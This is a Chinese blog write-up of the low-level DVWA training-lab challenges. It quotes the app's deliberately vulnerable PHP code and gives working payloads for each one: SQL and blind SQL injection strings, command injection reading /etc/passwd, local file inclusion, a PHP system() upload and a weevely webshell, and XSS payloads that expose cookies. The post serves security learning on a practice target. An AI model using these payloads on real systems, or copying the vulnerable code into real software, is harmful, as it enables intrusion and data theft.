本篇文章为各位正在学习DVWA提供解题思路,同时也是本人的学习笔记,本文中的方法仅为验证漏洞,并无攻击目的。DVWA安装,可以使用docker容器,非常简单方便,通过以下链接:
Docker Hub
https://hub.docker.com/r/sagikazarmark/dvwa
medium级别,请参考 http://t.csdn.cn/w3kea
0x01. 暴力破解
看一下源代码,这里存在一个sql注入,用sql注入看一下效果。
注入代码:
admin' or '1'='1
admin' #
注入成功了。
不过因为是暴力破解的题,我们继续使用爆破方式来解题。打开burp suite,账号是admin,随便输一个密码。在burp里面捕获这个请求,看一下
右键请求内容,发送到intruder
先清理掉所有的标记,然后在密码参数的前后添加标记,这里只有密码可以爆破。
然后进入payloads页面,找一份字典文件,导入
到options页面,在匹配里面加上incorrect,然后就start attack,找到密码password
这里没有出现incorrect,代表密码正确。
0x02. 代码注入
先看题目,是一个ping命令
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
?>ping命令的调用直接拼接了输入参数,所以,我们可以构造各种参数来执行系统命令,使用管道命令‘|’来执行其他命令,查看passwd文件
| cat /etc/passwd
查看一下用户组
| cat /etc/group
也可以注入其他命令,创建一个shell,新增一个账号等。
0x03. CSRF
CSRF产生的原因是没有校验referer导致的,攻击者可以通过CSRF操作
0x04. 文件包含漏洞:
文件包含漏洞产生的原因是开发者将本地文件变为参数,动态调用本地文件所导致的。看一下源码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>page参数包含了文件,我们修改page参数来获取文件,如下
http://localhost:8080/vulnerabilities/fi/?page=/etc/passwd可以获得服务器的密码文件。
0x05. 文件上传漏洞
文件上传漏洞造成的原因是因为没有校验上传的文件,用户可以上传可执行的php文件。
编写如下php文件,用php的system函数来调用系统命令:
<?php
system('cat /etc/passwd');
?>上传文件,获取路径
直接访问路径下的文件,可以执行系统命令:
这个漏洞存在,我们上传一个webshell试一下,用kali里面自带的weevely生成一个webshell.php
weevely generate 123456 ./webshell.php用这个命令可以产生一个密码为123456的webshell.php,然后我们上传文件到服务器
上传之后,用weevely访问这个路径,获得shell
0x07. SQL注入:
先看题目的代码,这种是最经典的SQL注入漏洞:
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>$query参数直接把$id参数的值直接带进来了,所以我们可以使用拼接的方式注入我们想要搜索的代码,使用以下方式注入我们的代码:
#union select方法一
1 union select * from users
#union select方法二
1 union select user() from users结果为:
0x08. SQL盲注
sql盲注可以使用sqlmap来实现,也可以自己编写简单的python脚本来攻击。sql盲注产生的原因有很多种,一种是服务器在返回错误信息的时候,会返回带有结果的错误信息,利用这个信息差,攻击者可以尝试不同的输入来猜测结果,还有一种是利用服务器的时间差来猜测命令是否被执行。
看下本题的代码
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>如果select语句有返回值,且返回1行,那么我们可以构造如下语句来盲注获得数据库名称
猜测成功会返回成功
在盲注之前,我们看一下几个逻辑关系。当我们输入1的时候,web返回的值为exist,也就是真,如下图
如果我们使用“与”逻辑,也就是and盲注,那么前面必须为真。所以我们使用下面的盲注方法,用真 and 「盲注语句」 只有「盲注语句」也为真的时候,返回真。
#使用二分法盲注获得数据库名称,a=97,z=122
#a-m之间,a=97,m=109
1' and ascii(substr(database(),1,1))>=97 and ascii(substr(database(),1,1)) <= 109#
#返回正确,继续猜测a-g,a=97,g=103
1' and ascii(substr(database(),1,1))>=97 and ascii(substr(database(),1,1)) <= 103#
#返回正确,继续猜测a-d,a=97,d=100
1' and ascii(substr(database(),1,1))>=97 and ascii(substr(database(),1,1)) <= 100#
#...
如果使用或逻辑,那么原来的User ID就需要用一个假的,也就是假 or 「盲注语句」,只有当「盲注语句」为真的时候,返回真。如果User ID是真的时候,那么不管我们盲注什么,都是真,也就达不成目的了。
不管用哪种语句,一定要确定原来的UserID用真,还是假。
0x09. XSS跨站脚本攻击-反射型
XSS的本质是HTML代码注入,直接将用户输入返回到输出,看一下这个题目的代码
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>Low级别的代码非常的简单,直接将输入返回到标签<pre>输出,随便写一个XSS代码
<script>alert('/XSS')</script>,返回的输出是<pre>Hello <script>alert('/XSS')</script> </pre>
script标签会被执行。
也可以试试这个payload: <script>alert(document.cookie)</script>,会显示你的cookie。
0x0A. XSS存储型
存储型XSS是将注入的代码存储到数据库中,当其他用户打开页面的时候,就会执行这段代码。看一下题目
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>这段代码直接把用户输入的message和name insert到数据库里面,写一个XSS验证,name随便写,message里面写入<script>alert('/XSS')</script>,页面如下
0x0B. 总结
DVWA的Low级别主要是让大家了解Web的攻击,没有任何难度,对于初学Web安全的同学非常有帮助。对于中级和高级,只要改变一些攻击的姿势,同样可以利用漏洞。请持续关注本人的博客。
785
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
